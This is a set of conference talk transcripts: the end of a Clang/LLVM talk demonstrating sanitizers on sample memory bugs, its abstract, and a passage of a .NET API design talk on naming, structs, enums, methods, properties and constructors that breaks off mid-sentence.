Yeah, oob.cpp is also an out-of-bounds one: somebody tried to duplicate a string. It allocates memory — great. Checks the return value — also great. strcpy's it — fantastic. Also frees it. The problem here is that strcpy will try to write the terminating zero. Do I need C++ for this? No. In this case the address sanitizer will tell you that you have a heap buffer overflow. Most of these things could easily be caught by Valgrind, but Valgrind might be a few times slower than this; if you have a larger project, it will introduce a larger slowdown. So what happened here is that it intercepted the strcpy operation, which is called from this function, and if you go to that function you can see that the strcpy is overwriting the heap. Yes — there's one more thing there.
I always approach malloc-plus-one a bit cautiously, because — I don't know how, but — if count is SIZE_MAX, then adding one to it wraps around to zero, and malloc(0) will return either null or some pointer that you can't dereference, which triggers undefined behavior. Yeah, I think I have seen this in real life. What is it? This one: use-after-free — not the C one, the C++ one. Yeah — not exactly this, but something like this; it's a mixture of C and C++ shared pointers. So an X object is created — great — as a shared pointer, then the user gets a raw pointer to pass to a C function, but unfortunately here it already goes out of scope and the object gets deleted. Use after free — useafterfree.cpp. This also brings out a lot of information: in X's foo we have accessed something that was freed, called from my callback, and if I go back to useafterfree.cpp — yeah, my callback calls this, but the object has already been freed. Other than that, do we have an MSan example here? umr.cpp. We have an int pointer as a member; we create five integers in the constructor and delete them in the destructor. It all looks fine, but unfortunately we don't initialize the array. Oops — memory.cpp. It will detect that we try to access it, and maybe we can enable debug information — does it help? Yes, it did. So in line 13 there was an uninitialized variable. Five... sorry, where? In line five? Yeah, true — that's undefined. And finally we have the undefined behavior sanitizer. I think — yeah — this is the case where we can't statically prove the array bounds, prove that you're accessing beyond the array. We're going to enter an index from the command line. So one would work — that's one to four; I think that's wrong, it should be zero to three. If we try to access, say, the sixth element, that triggers a runtime error. This could also — yeah, I don't think I've tested this signed overflow recently — yes, it also catches signed overflow; I can run it directly and it tells you exactly the problem. So I think that's all about the sanitizers. We have very little time left. I will try to open source this LLVM demo — although there are a lot of LLVM examples around, this one is a simple imitation of Clang: how Clang works, how it parses the code, how it transfers control to the semantic analyzer, generates the AST, and traverses the AST to create an object file. So, do you have questions? One thing — you didn't talk much about libclang; isn't libclang the big feature? Yeah, true. I personally never used it; I use the C++ libraries myself. But yes, as you said, libclang is used by many IDEs, and there are some extensions to Vim that use libclang to parse the source code and produce suggestions. I have no personal experience with libclang directly — this example, for instance, I linked directly against LLVM, and when I create a tool (I have created a few tools before) I use the C++ libraries directly. Yeah — there are some settings in clang-modernize; I don't know that case, honestly, I haven't worked with modernize much. But modernize will ask you how much risk you want to take when you modernize, because it will modernize based on its own judgment, basically, so you tell it where to stop. It might be related to that, but I really don't know the answer — I need to check that. Any more questions? Okay, done? Right.
Thank you very much — and if you can, please vote; green, hopefully. I wish you well.
|
LLVM came a long way from being a research project to a production quality environment for building compilers. Clang is built on top of LLVM and is a leading compiler for C family languages. Hands-on demonstration of clang's technical advantages, tooling support, and bleeding edge C++1y implementation.
|
10.5446/50807 (DOI)
|
Hello. Are we good? Can anyone hear me? Awesome. Okay, so we'll get started. Hello everyone, and welcome to the session: it's Wonderful .NET — API design. We'll get started with some introductions. My name is James Newton-King. I'm from Wellington, New Zealand, all the way down there. I've been a .NET developer for a little over 10 years. If you're familiar with Flight of the Conchords, they have some wonderful demotivational posters about New Zealand. It's a lot further away than it looks — I just flew in a couple of days ago. Probably what I'm best known for: about eight years ago I started a project called Json.NET, and from that project, and just from regular .NET development, I've gained quite a bit of knowledge about API design. I think it's a skill that's little talked about amongst .NET developers — there's been a lot of focus on REST API design, and I think it would be good to focus a bit on .NET API design. So to get started: what is .NET API design? What is a .NET API? Really, an API is types, properties, methods — it's the members on types, it's constructors, it's perhaps more .NET-specific constructs like events. It's really the code that you interact with when working with a library. And API design is really about communicating what an API does. If you could stand over the shoulder of every single developer who was using your code, you wouldn't need to worry about API design, because you could just tell them. But because you're not there, you need to create APIs that are able to communicate to users — to developers. So imagine we've got some code here: we're connecting to a database, we're getting a count from a database table, and then we're returning that. The problem with this code is that we're creating a connection to a SQL database but we're not closing it. The way you, as an API designer, communicate to a user that there is a resource they need to clean up is you make it implement IDisposable. As soon as you implement IDisposable, that developer should be able to see that this is something they need to clean up — and if they don't already know that, then hopefully either Visual Studio or a tool like ReSharper tells them. And when they see that they need to clean that code up, they'll just change their usage of the API — in this case, the SQL database API — close their connections and fix their code. So it's all about creating code which communicates to developers how they should use it. So why is API design important? It's potentially the difference between an API that discourages users and wastes their time through trial and error and having to look at documentation, and a good API which creates productive and happy users. API design is also important because APIs are forever. Ideally, any API — any code which is designed to be reusable — shouldn't change. I've got a little star against "APIs are forever", because there's a range of how much change you're able to do to an API. If an API is for internal use only — so really you're just referencing another project, perhaps a reusable data layer to talk to your database — then it's pretty easy to change: if you rename something, perhaps a method, then ReSharper or Visual Studio will automatically rename it throughout the rest of your solution.
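That database example, with the cleanup signalled through IDisposable, looks roughly like this — the table name and connection string are made up for the sketch.

    using System.Data.SqlClient;

    public class CustomerRepository
    {
        private readonly string _connectionString;

        public CustomerRepository(string connectionString)
        {
            _connectionString = connectionString;
        }

        public int GetCustomerCount()
        {
            // SqlConnection implements IDisposable, which is the API telling us
            // "there is a resource here you need to clean up".
            // The using blocks guarantee the connection is closed even on exceptions.
            using (var connection = new SqlConnection(_connectionString))
            using (var command = new SqlCommand("SELECT COUNT(*) FROM Customers", connection))
            {
                connection.Open();
                return (int)command.ExecuteScalar();
            }
        }
    }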
If you're shipping a DLL within your company, changing the API is perhaps slightly more problematic than that internal-use case. If you're publishing a framework on NuGet, that's harder still, because you aren't able to immediately communicate to your users that the API is broken. The worst case scenario is if you're publishing a NuGet package which other NuGet packages depend on: you make a change which breaks those other packages, and anyone who uses them is broken until those other library authors go and update their own packages. So the worst case scenario happens to be my own library, Json.NET. This diagram was created by a developer — a program manager — on the NuGet team, and at the bottom of an inverted stack of cards is Json.NET. If I make a breaking change, then I could potentially break hundreds, maybe even thousands, of other NuGet libraries — 1,500 other NuGet packages depend upon Json.NET. So when you get to that sort of scale, APIs really are forever. You make a breaking change to a low-lying library like Json.NET or the .NET framework and you're going to create a lot of unhappy developers. And the thing about APIs is that every piece of code that uses an API in its current form is an investment in it; if you're breaking APIs, you're destroying that investment. API design is important because everyone really is an API designer. Code should not just be maintainable — ideally it should be reusable. So you want to aim for DRY: don't repeat yourself. When you're designing APIs — and this might just be your payment service within your own solution, some .NET classes, methods, properties — that is an API, and you want to think about reusability. So thinking about API design encourages good programming. So what makes a good API? A good API should be both easy to learn and easy to use. Easy to learn: it should be consistent with the platform. If you're working in the .NET environment, if you're publishing a .NET package, you should follow the .NET naming standards and use .NET constructs — if you're communicating with the file system, you should talk to streams; you shouldn't invent your own way to talk to the file system. A good API should be consistent with itself: if you're doing two tasks in two separate places, you should do those two tasks the same way; you shouldn't unnecessarily complicate and confuse things for your users. And a good API should be easy to use. It should be well-named, and you want to aim to make it as strongly typed as possible. IDEs are fantastic — Visual Studio, amongst .NET developers, is fairly ubiquitous, and IntelliSense is awesome — so strong naming and strongly typed classes are your friends; they help with IntelliSense. Conversely, with "easy to use" you also want it to be hard to misuse: for example, if a user does something wrong and sets something to a bad value, you want to validate that, throw an error quickly, and tell them they've done something wrong. So, perhaps an example of some bad classes — a bad API — in the .NET world is this code. Just immediately looking at it, it's not following the .NET naming standards. Imagine, if you will, that these were constants instead of an enumeration: an enum provides a great strongly typed way of telling a user what values are available, so you'll get a compile error otherwise. This code has invented its own way to talk to a file system — it's using its own custom file adapter rather than just taking the built-in .NET Stream.
And it's using setters instead of properties, so it's not using the built-in .NET — well, in this case C# — language features. This might be an example of a Java API that someone's ported directly to .NET without putting in the time and effort to make it easy to use within the .NET environment. I don't know about you, but if I came across having to use this sort of library, I'd be very upset — it's not pleasant code to use; if anyone's ever used a Java port to .NET, it's not a pleasant experience. A good API should also encourage code that uses it to be easy to understand and maintain. An example I can think of: imagine this is an NHibernate mapping configuration XML file — NHibernate is a .NET ORM — and this piece of XML is mapping a .NET type to a database table; that's what it does. The problem with encouraging code like this — in this case XML — is that it's verbose: you're having to go in and manually type it, and it's brittle; it's not strongly typed. If you rename your .NET class, then this is going to break when you run. Compare that to something like using plain attributes on the .NET class: it reuses the property names rather than having to specify them manually like you were in the XML. By placing an attribute on a property, you immediately reuse that property name and its type, likewise with the ID. This sort of pattern is convention over configuration, and it's leveraging the type that you're already using rather than duplicating all the mapping information in an XML file — and it leads to code which is easy to use, understand and maintain. You want to create APIs that are sufficiently powerful to meet requirements, but not overly powerful. When you're designing APIs there's often a conflict between two goals: creating an API that is powerful enough to meet the needs of a broad range of developers, while still being simple for users who just need a small subset of it. So when you're designing an API, you need to be careful that you don't ruin simplicity by being overly powerful. A good API can also evolve: bugs can be fixed and features can be added without making breaking changes. A good example of that is the .NET framework — it has maintained compatibility pretty well over the years while still being able to add lots of new features. So now we'll talk about a bunch of general API design principles, and perhaps the most important principle is the pit of success. This is a term that was coined by an employee at Microsoft: "In stark contrast to a summit, a peak, or a journey across a desert to find victory through many trials and surprises, we want our customers to simply fall into winning practices by using our platforms and frameworks. To the extent that we make it easy to get into trouble, we fail." Success shouldn't be climbing a mountain — users shouldn't need to figure out how to make complex configuration files or understand complex processes. It shouldn't be like trekking across a desert — you shouldn't need to write tons of boilerplate code to successfully do a task with an API, and you shouldn't have to wade through tons of documentation, tons of methods and settings on many different classes, to find what you want. Success should be as simple as falling into a pit. So the goal when you're designing APIs is to make it easy to succeed and hard to fail.
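Going back to that mapping example for a moment: the attribute-based, convention-over-configuration style can look roughly like this. The sketch uses the data annotation attributes from System.ComponentModel.DataAnnotations (the way Entity Framework code-first does) rather than NHibernate's own mapping, and the Person class and table name are invented for the example.

    using System.ComponentModel.DataAnnotations;
    using System.ComponentModel.DataAnnotations.Schema;

    // The class itself carries the mapping. Rename a property with your IDE and the
    // mapping follows automatically - there is no separate XML file to keep in sync.
    [Table("Person")]
    public class Person
    {
        [Key]
        public int Id { get; set; }

        [Column("FullName")]
        public string Name { get; set; }
    }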
And hopefully we'll look at a whole bunch of ways of making it easy to succeed and hard to fail throughout the rest of the presentation. Another general principle is the wall of complexity. The wall of complexity is the idea that your API should offer a steadily increasing slope of difficulty as its usage becomes more complex. If your user suddenly requires a huge increase in knowledge or a huge increase in effort to perform an additional minor task, that's an example of them running into a wall of complexity. Imagine you have a form and suddenly you need to do a specific bit of custom validation, and what you expected to take 30 minutes takes two days — that's an example of hitting a wall of complexity. And chances are, when a user hits a wall of complexity, they're going to fail, and they're not going to have a pleasant experience. It's great, isn't it? An example of a framework that I think hits a wall of complexity is good old ASP.NET Web Forms. Web Forms was advertised as a way of creating rich web pages on the server using simple drag and drop in an IDE: double-click on a button and suddenly you've got an event, and everything's nice and simple. The problem with Web Forms is that if you need to start performing even moderately complex tasks, you suddenly hit this enormous wall of complexity — all this knowledge you suddenly need about the ASP.NET lifecycle and the Web Forms page lifecycle, all the events that happen. This is a diagram showing all the different events that can be raised off a Web Forms page: you need to know when the postback happened, when data binding happened, when rendering happened. For me, I always hit this problem when I needed to post back values to data-bound drop-downs and a repeating list — suddenly you need to worry about what order you bound the list and what order the postback values were applied to the list. It all became very complex, from a framework which was advertised as something that's meant to be just drag and drop, double-click and you're done. A framework which did it better, in my opinion, is ASP.NET MVC. Obviously MVC requires you to have some knowledge of HTML and some knowledge about HTTP, but it's really a steadily sloping increase of difficulty as you do more and more complex tasks. If you need to do complex Ajax callbacks and you have complex JavaScript, that isn't suddenly orders of magnitude more difficult than what you're currently doing — MVC provides nice hooks for you to add in complexity, but you only need to hook them in when needed. An example of a framework which does this wall of complexity really badly — it's almost an anti-pattern — is WCF. WCF puts all the complexity up front, even if you're doing a very simple task, like wanting a basic HTTP service where you give it some XML and get some XML back. There's all this configuration, all this knowledge, all this learning that you need to understand — especially the configuration; I could never get it right — and you need to understand it all up front. It's not a great framework. So the next general principle is the power of sameness, which sounds kind of weird. It's a term coined by a guy called Brad Abrams, an ex-Microsoft employee.
And the idea of the power of sameness is that by creating APIs that use features developers already know, developers can quickly achieve tasks because they already know how to do them. An example — and this is the example that he uses — is that of interacting with a car. No matter what car you're in, whether it's a taxi, your friend's car, your own car, or a car you're renting, door locks tend to work the same way. If you're confronted with a door and you need to unlock it, chances are you don't need to ask for help, you don't need to read an instruction manual, because they all work exactly the same way. That's the power of sameness — likewise with a seatbelt; all seatbelts tend to work the same way. Imagine that within the context of a .NET API: you want to use naming standards that everyone's familiar with; you want to use common types and interfaces like IDisposable, which everyone's familiar with, and Stream; you want to use configuration patterns that people are familiar with — put configuration in web.config or app.config rather than your own custom files. By using these techniques that developers already know, you're helping them fall into a pit of success: they already know how to do these things, so they don't need to learn them again just for your API. When you're starting out designing an API, probably one of the most important things is to start small. You want to start small firstly to provide a solid foundation, but also because you want to release quickly. You want to release quickly because, at least initially, you're just guessing how your API is going to be used — you don't know all the different ways developers could potentially use it. The sooner you release, the sooner you can start getting feedback, and by starting small you're minimizing the number of changes you'll potentially need to make: if you've made mistakes, the number is smaller. What you want to think about here is that incremental improvement is better than delayed perfection — and that's especially important because your idea of perfection could be quite different from your users'. You want to listen to user feedback, but when listening to user feedback you need to be able to decipher what users say versus what they mean. Users will tend to suggest specific features that solve their problem and perhaps don't address other people's problems. Imagine, if you will, you had a custom list class; it has some strings in it, and it has a method to sort. A user of your API will tend to come along and suggest: what you need is a new method that sorts in exactly this way that I want it to sort. And what you could do is add a new method — CrazyUserSort — that implements their sort for them. That's what they've suggested, but while that works for them, it doesn't work for other developers. Each new developer who uses your API might come along and request a new sort mechanism. That's bad, both because it's putting lots of work on you, and bad for your users, because they're waiting for you to add new sorting methods. So you don't want to do that. What you really want to listen to is what they mean: what they mean is that they want a way to customize the sort, and they want a way to do it themselves. So this is an example from the .NET List class.
And it has a Sort function on it that takes a comparison delegate. The delegate takes two values. And then within it, you can hook in your own custom comparison logic and sort it yourself. And by doing this, you've created a mechanism that works not just for the developer who said they needed a way to do custom sorting; it works for all users of your API. So as well as positive feedback, you can also get negative feedback. And just because it's negative feedback, it doesn't mean you don't want to listen to it. So there's this quote from Benjamin Franklin: critics are our friends, they show us our faults. So it might be a user complaining on Twitter about how horrible something is. But you want to think about what they say and think, is there a way I can solve their problem for them? So expect to make mistakes, especially at the start. So in your initial release, you're really just guessing what users want and how they'll use your API. So it's quite easy for you to make mistakes, and you should pretty much expect to do so. So the way you can get around this is starting small and releasing often. That both minimizes the amount of changes that you'll make, so the mistakes that you've made are minimized, and it's that whole releasing early and often, incremental improvement. If you do make a mistake, don't be afraid to make types and members obsolete. To do that, within the .NET framework, you place an Obsolete attribute on a member. It will show up crossed out in IntelliSense, so all new users won't use it. And any existing users of your API, when they recompile, they'll get a compiler warning. And within that attribute, you can provide a description of what they should do instead. Not all feature suggestions are good. And also not all pull requests, if you've got your source code on something like Git, are good. Don't be afraid to say no if you don't think it's a good feature. With features, you want to think about quality over quantity. You want to focus on doing a good job for the most users possible. And if you can help those perhaps non-normal use cases without hurting your core users, then that's great; perhaps accept those pull requests. But otherwise, don't be afraid to say no if you don't think it's appropriate for most users. So those are the general principles of API design. For the rest of the presentation, we're going to focus on lower level API design and how it relates specifically to .NET. So the .NET framework has extensive naming guidelines, and for the most part, unless you've got a very good reason otherwise, you should always follow them. So the first one is always Pascal case namespaces, types, and delegates. So Pascal case, as you can see on that slide, each word should start with a capital letter. You also want to Pascal case methods, properties, fields, and events. And you want to camel case parameters. So the .NET naming guidelines are pretty simple: Pascal case everything except parameters to methods or constructors, and camel case those. You'll note in this code, I have a private field and it's starting with an underscore. The naming guidelines are really just for public members and public types. Anything private or internal, anyone who's interacting with your API won't see, so you can name those however you want. I've always done an underscore on my private fields. But yeah, whatever you want.
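A small sketch pulling those casing conventions together, including the Obsolete attribute; the type and member names here are hypothetical, not from any real library:

```csharp
using System;

// Pascal case for the type and its public members, camel case for parameters.
public class OrderProcessor
{
    private readonly string _connectionString; // private fields: name them however you like

    public OrderProcessor(string connectionString)
    {
        _connectionString = connectionString;
    }

    public void SubmitOrder(string customerId, decimal orderTotal)
    {
        // real work would happen here
    }

    // A mistake kept around for existing callers; new users see it crossed out in IntelliSense.
    [Obsolete("Use SubmitOrder(string customerId, decimal orderTotal) instead.")]
    public void Submit(string customerId, decimal orderTotal) => SubmitOrder(customerId, orderTotal);
}
```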
One interesting rule that a lot of people don't follow is you want to always Pascal case acronyms that are three letters and longer. So some examples. In the .NET framework, it isn't XMLDocument with XML all uppercase; it's XmlDocument with Xml Pascal cased. Likewise, HttpClient. But then if it's only two letters, so in this case IOException, you can leave those both as capitals. Some additional tips when naming your types and members. You want to avoid acronyms. So a good way to test whether an acronym is acceptable is to just go to Google, and if lots of people are referring to it by the acronym, so if people are talking about HTML rather than hypertext markup language, then the acronym is great. Avoid abbreviations. Well, I'd say even stronger: don't abbreviate. IDEs these days, like Visual Studio, have auto-complete. Typing, writing code, that's fast. You write code once; you read it dozens of times. So you want to make your API optimized for readability rather than for quick typing, within reason. That will help avoid developer confusion when reading your APIs. So a bunch of other random tips. Interfaces, start those with an I. Generic type parameters, start those with a T. So in the case of the generic dictionary, it takes TKey and TValue as its generic types. And then there's a bunch of .NET types that, when you inherit from them, you should always suffix with a certain bit of text. So attributes should always end with Attribute. If you're implementing your own custom exception class, it should always end with Exception, streams with Stream, and so on. So interface and abstract base class design is interesting. There's a bunch of common pitfalls that people make when designing interfaces and abstract base classes. The first one is they put too many methods on an interface or an abstract base class. The canonical example, the one that I always think of, is the old membership provider in ASP.NET. So all these methods and all these properties are declared as abstract on this base class, and whenever you implement it, you need to implement all of them. So quite often, I've needed to implement this to plug it into some other application, and all I needed to do was validation. And all I end up actually implementing, if you can read it closely, is ValidateUser and GetUser. Those were the only ones that the other framework was using. But because this base class had all these abstract members on it, I had all these additional methods, and I just had to leave them throwing NotImplementedException. So if you're familiar with SOLID, this is an example of the interface segregation principle. You want to keep your interfaces small and focused, and likewise with your base classes.
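A minimal sketch of that interface-segregation point, using hypothetical types rather than the real membership provider:

```csharp
// Instead of one fat base class with dozens of abstract members...
public interface IUserValidator
{
    bool ValidateUser(string userName, string password);
}

public interface IUserStore
{
    User GetUser(string userName);
}

public class User
{
    public string UserName { get; set; }
}

// ...a consumer that only needs validation implements only what it actually uses.
public class LdapUserValidator : IUserValidator
{
    public bool ValidateUser(string userName, string password)
    {
        // real validation logic would go here
        return !string.IsNullOrEmpty(password);
    }
}
```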
So the other common pitfall is having a method that is impossibly complex to implement. A good example of this in the .NET framework is IQueryable. IQueryable has just a couple of methods on it that you need to implement, but one of them takes an expression tree, and an expression tree can be an expression tree of any expression. And really, IQueryable needs to be able to handle any expression given to it. But there's actually only one proper implementation of a LINQ provider, and that's LINQ over in-memory data structures. Every other LINQ provider, like Entity Framework's LINQ provider, if you give it a certain expression, it's going to fail. So I'm not saying IQueryable was bad in this specific case, but it's something you want to keep in mind: have you got a method on your interface or abstract base class that is just impossible for the average person to properly implement? So also with abstract base class design and interfaces, you want to provide an implementation, and you want to provide consumers of that implementation. By doing this, you're ensuring that you've thought about how your interfaces or base classes should be used. So an example I can think of in the .NET framework of where this wasn't done is ICloneable. ICloneable shipped in .NET 1, and some classes implemented ICloneable, but no APIs actually consumed ICloneable. And unfortunately, the ICloneable description of how it should work is a bit ambiguous. Like, should ICloneable clone just the current object and not its child objects? Should it clone all its child objects? Do all its child objects then need to implement ICloneable before they can be cloned? And because it wasn't properly defined how it should work, and because no one actually used it in the .NET framework v1, it's sort of become this orphaned interface that's never been used. And because it's already in there, it can't really be reintroduced now and done properly, because the name's been taken up. So this would be a case of something which perhaps should have been left out and then added if needed at a later date. And because it's never used, it's forever alone. So structs are interesting. Structs are similar to classes; you can do a lot of the same things you can with classes. The difference between structs and classes is that structs aren't allocated on the heap. They're value objects; they're on the stack. And because of that, there's no need to allocate them or garbage collect them, so they have some potential performance benefits. But there's only a certain number of circumstances when you want to use a struct. Because they behave subtly differently to classes, and users generally expect something to work like a class, you want to use one only when performance is important, the struct represents a single value, and the struct is small. The difference when you're passing them around is that a reference to a class sitting on the heap will always be the exact same size no matter how big the class is. With a struct, when you're passing it around and assigning it to variables, you're passing around the entire struct. If your struct has hundreds and hundreds of fields on it and it's potentially quite large, you're going to use up a lot of memory each time you create a new one or pass it to a method. So for those reasons, you want to only use a struct when you have a small number of fields. The rule of thumb that the Microsoft guidelines recommend is under 16 bytes. So if the total size of your fields, your ints and floats and so on, is greater than 16 bytes, you probably want to stick with a class. You also always want your structs to be immutable. You can get some really odd behavior, because they're stack allocated, when they get boxed. So if you assign one to an object reference, the .NET framework will box it, and if you then make modifications, they won't flow through to the boxed copy. It's complex, the situations where it can happen. And for that reason, you should really only use structs which are immutable.
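A small illustration of the kind of surprise being described, using a deliberately mutable, and therefore badly designed, hypothetical struct:

```csharp
using System;

struct Counter
{
    public int Value;
    public void Increment() => Value++;
}

class BoxingSurprise
{
    static void Main()
    {
        var counter = new Counter();
        object boxed = counter;       // boxing copies the struct onto the heap

        counter.Increment();          // only the original copy changes

        Console.WriteLine(counter.Value);            // 1
        Console.WriteLine(((Counter)boxed).Value);   // 0 - the boxed copy never saw the change
    }
}
```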
Structs should also only have a valid empty state. Because they're stack allocated, the default value isn't null. The default value of a struct is a struct with all its fields set to their default values. So if you, for example, create an array of structs, each of the elements in that array won't be a null value; it will be an empty struct, a struct with its default value. So for example, DateTime in .NET, its default state is all zeros, midnight on day one of year one. And decimal, which is another example of a struct within .NET, its default value is 0. So you need to think about having a valid empty state. And finally, a struct should implement IEquatable. Because structs aren't reference objects, when .NET compares two of them, it isn't as simple as comparing two references and seeing whether they point towards the same object. What .NET does is it will use reflection to reflect over all the struct's fields and compare them one by one, which is quite slow. So you want to manually implement IEquatable yourself. So this is just a quick example of a struct done well. Things to notice: the fields are immutable, so we've got a constructor which is assigning those fields, and down there we've implemented our own IEquatable. IEquatable is quite simple. It's just an Equals method which takes the same type as itself, and then within there you can manually do your comparisons. So structs are great for performance, but you just want to be careful about how you use them. So designing enums. Enums are great for closed sets of choices. They allow you to strongly type a choice, and by strongly typing it, you're giving users IntelliSense, you're giving them documentation. So a great example of an enum is DayOfWeek. It's small, it's constrained, it's not going to grow. A bad example might be Windows version. Microsoft's constantly releasing new versions of Windows, it's constantly releasing new service packs, so every time you release a new version of your framework, you're just going to have to add more and more Windows versions. This might be a case where a better choice is using integers to represent a version. With enums, you want to provide a value for zero. Again, they're value types; the default value of an enum is zero, and you just want to provide a named value for that. So in the case of StringSplitOptions, this is an enum in the .NET framework; its default value is None. The first enum value is always zero, then the next one will be one; unless you provide numbers yourself, it will always start at zero. So an enum can support having multiple values at once, and the way you do this is by specifying the Flags attribute on that enum. So this is an example from JSON.NET of a flags enum. It's got the Flags attribute on it. And then what you need to do for each value within the enum, and unfortunately there aren't more of them on this one, otherwise you'd see it more clearly, is you should always go by powers of two. So you should always start with zero, then one, then two, then four, then eight, then 16, then 32. By doing that, you are able to give users the option to OR those values together. So that way a user can say preserve references handling should be enabled for both objects and arrays by OR-ing those two enum values together. And within a flags enum, you can do that yourself; so All, for example, is Objects and Arrays OR'd together.
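A minimal sketch of a flags enum and how callers combine its values; the names here are hypothetical rather than the actual JSON.NET enum:

```csharp
using System;

[Flags]
public enum CacheOptions
{
    None = 0,
    Compress = 1,
    Encrypt = 2,
    SlidingExpiration = 4,
    All = Compress | Encrypt | SlidingExpiration
}

class FlagsExample
{
    static void Main()
    {
        // Because every named value is a distinct bit, callers can OR them together.
        var options = CacheOptions.Compress | CacheOptions.SlidingExpiration;

        Console.WriteLine(options.HasFlag(CacheOptions.Compress));  // True
        Console.WriteLine(options.HasFlag(CacheOptions.Encrypt));   // False
    }
}
```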
So with methods, you want to provide descriptive parameter names. Not only do they appear in IntelliSense; in the latest versions of C#, they can also be used as named arguments. So by giving descriptive parameter names, it can be the difference between a user quickly and easily using a method and succeeding, or having to ask for help because they don't understand how it should be used. This is an example of just helping them fall into a pit of success. With methods, you want to have a consistent parameter order across overloads. You don't want to confuse developers by mixing around the order of the parameters that the method overloads take. So an example, and this isn't a terribly good example because this is actually constructors, but this is from within the .NET framework. It's an example of the same parameters appearing in different orders. So the one down the bottom: pretty much every other exception in .NET will always take message as the first argument, but ArgumentNullException is the one exception in the entire .NET framework that takes paramName first. And quite often you see developers getting them in the wrong order, and then the description when ArgumentNullException is thrown is a little weird, because it gives the message as the parameter that's null and then the parameter name as the message. When you're designing methods, you want to prefer enum over boolean parameters. An enum parameter with a descriptive name is much more obvious in what it does than a boolean parameter. So an example: we've got two overloads here. We've got an Equals which takes two strings and a boolean, and an Equals which takes two strings and an enum. In that first overload, it isn't immediately obvious what that true is doing. Is that true to ignore case? Is that true to ignore culture? Is that true to trim whitespace from the beginning and the end of the strings that we're passing in? It's not immediately obvious. Whereas with the second overload, the one which takes the enum, straight away a user can immediately understand exactly what it's doing. So that's why you want to prefer enums over booleans for parameters when you can, even if you just have two values. So even if you could use true/false, it's a lot easier if you just define an enum. You want to avoid out and ref parameters. So in this example, when someone wants to call this method, they're passing in an assembly path and they're getting out a title, they're getting out a description, and they're getting out a company for that assembly. They need to define all these arguments before they can call your method, and then they pass them in. It's much easier for a user to just use a method which returns one type. So just create your own object, assign the values to it, and return that, and it's much easier for users to use. Don't be afraid to create helper methods. A goal of the pit of success is to prevent users from making mistakes. So anytime you have boilerplate code that's repeated over and over within your application, whenever someone potentially needs to use an API, think about wrapping that up in a helper method. So rather than having to create a string reader, then creating a JSON text reader which uses the string reader, then having a schema resolver and a schema builder, it's much easier. Really, all the user is passing in is a string, and they're expecting to get back this JSON schema object.
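As a sketch of the shape such a helper takes; the names here are illustrative BCL-based stand-ins rather than JSON.NET's actual schema types:

```csharp
using System.IO;
using System.Xml;
using System.Xml.Linq;

public static class ReportLoader
{
    // All the caller really has is a string; the reader boilerplate is wrapped up for them.
    public static XDocument ParseReport(string reportXml)
    {
        using (var stringReader = new StringReader(reportXml))
        using (var xmlReader = XmlReader.Create(stringReader))
        {
            return XDocument.Load(xmlReader);
        }
    }
}

// Usage: one call instead of wiring up the readers by hand.
// XDocument report = ReportLoader.ParseReport(reportText);
```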
So by creating a helper method, we've eliminated the need for a user to firstly know to create this boilerplate code and to potentially make mistakes in it, and we're helping them fall into that pit of success. So properties are quite interesting. Although internally properties are really just methods, users expect properties to act like fields, and you should strive, when possible, to meet users' expectations. The first thing users expect about properties is that they should be fast. So imagine we've got this DB context object and we've got a Products property on it, and each time you call .Products, it's going off to the database and loading all the products out of the database. And then imagine the user puts it in a loop and there's 100 products: they're going to load every single product from the database 100 times. Now, a user probably wouldn't expect that from a property. They'd expect it to be fast and instant and have very little or no overhead. They almost certainly wouldn't expect it to call off to a database. So imagine you changed that to a method. Immediately, this looks a bit more suspect. If you saw code which was doing this, you would think, am I doing that the right way? Methods convey the expectation that there's potentially work going to go on inside; the method might be slow. So you'd probably want to cache your result once and then use that. So by not using a property in that case, by using a method instead, you're encouraging users to use the code more correctly. Also with properties, the result should be consistent. You don't expect fields to suddenly change; properties probably shouldn't change either. So imagine we had a Guid class and on it we had a NewGuid property, and NewGuid generated a new GUID every time you read it. That's probably not quite correct. What's probably a better way to do it is to have it as a method. Just like you can't have set-only fields, you probably shouldn't have set-only properties, even though .NET allows you to do it. So imagine we had a User class and we had a Password property on it, but it was set-only, and when we set that Password property, internally we would hash it and assign that to a field. That's a little weird to use. When a user sees that there's a Password property on a User, they'll probably expect to be able to both assign to it and get a value from it. So in this case, if you don't want the user to be able to read the value back, just change it to a method instead, and users will be much less confused. So for constructor design, constructors should be lazy. Where possible, you want to defer work until it is needed. So imagine in this case we've got an XmlFile object, and it's got a constructor on it which takes a path. And within the constructor, we're going off to the file system, we're loading that file into an XDocument, and we're assigning it. And then when someone calls GetXml, we actually return that XDocument. Imagine then that someone had this little LINQ statement, so they were getting all the files on the C drive that ended with .xml, they loaded them in, they instantiated these XmlFile objects, and then they assigned that to a list. Imagine further that a user then only uses maybe one or two of those XmlFile objects. Even though they've only used one or two, you've still gone off to the disk and potentially loaded hundreds of files. So what you want to do instead is make it lazy: you want to defer the work until it's needed.
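A reconstruction of roughly what that lazy version looks like; this is a sketch rather than the speaker's exact slide code:

```csharp
using System.Xml.Linq;

public class XmlFile
{
    private readonly string _path;
    private XDocument _document;

    // The constructor just captures the path; no disk I/O happens here.
    public XmlFile(string path)
    {
        _path = path;
    }

    public XDocument GetXml()
    {
        // Load lazily on first use, then cache so repeated calls stay fast.
        if (_document == null)
        {
            _document = XDocument.Load(_path);
        }

        return _document;
    }
}
```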
And constructors should really just be about initializing private fields from parameters. So in this case, we're now just assigning the path to its own string, and then within GetXml, at that point we do the work. And because we probably still want GetXml to be fast, we cache the XDocument. So we now get the best of both worlds: we still get our own custom XmlFile class which has got our business logic, but we're deferring the work until it's needed. With constructor design, this one isn't terribly important, but if all you're doing is setting a field from a parameter, just make the parameter name match the name of the property. It just helps users understand what's going on more readily. So one interesting thing about constructors, and this is something a lot of people don't know, is you want to avoid calling virtual members within a constructor. So imagine we have this Parent class, and it's got a constructor which calls DoSomething, and DoSomething is virtual. We then create a Child class that inherits from Parent. Within its constructor, we assign a message, and then in DoSomething we use that message field. Now there's a problem here. The problem is the order in which constructors are called. The parent constructor is called before the child constructor, but when DoSomething is called, it will always call the most derived override. So when we create an instance of our Child, we'll call the parent constructor first, it will call DoSomething, and DoSomething will expect message to be assigned, but it hasn't been. So for that reason, you want to avoid calling virtual methods within a constructor. Even if you do it correctly, if someone then inherits from your class and they override a virtual method to expect values from the constructor, you're potentially going to confuse the heck out of them, because it's all going to break. So, throwing exceptions. I'm of the opinion that how you fail is almost as important as how you succeed with an API. Users tend to learn not by reading documentation; they tend to learn just by grabbing some code and exploring classes and instantiating them and calling methods until stuff works. And giving them helpful exceptions helps them learn by failing. So in my JSON.NET library, probably the most common error that people encounter is deserializing incorrect JSON onto types. So in this 